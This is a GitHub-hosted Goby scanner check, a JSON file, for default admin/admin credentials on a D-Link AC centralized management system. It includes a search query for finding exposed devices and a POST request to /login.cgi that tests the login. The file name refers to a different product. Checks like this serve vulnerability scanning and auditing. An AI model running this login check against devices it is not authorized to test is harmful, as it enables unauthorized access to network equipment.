-
Notifications
You must be signed in to change notification settings - Fork 8
/
Hsmedia_Hgateway_Default_account.json
55 lines (55 loc) · 2.14 KB
/
Hsmedia_Hgateway_Default_account.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
{
"Name": "D-Link AC Centralized management system Default weak password",
"Level": "2",
"Tags": [
"Default weak password"
],
"GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"",
"Description": "D-Link AC management system has default account password, which can be used to obtain sensitive information (admin/admin)",
"Product": "D-Link AC management system",
"Homepage": "http://www.dlink.com.cn/",
"Author": "PeiQi",
"Impact": "<p>Access to sensitive information<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.cgi",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "user=admin&password=admin"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "flag=0",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 21:13:54",
"GobyVersion": "1.8.255"
}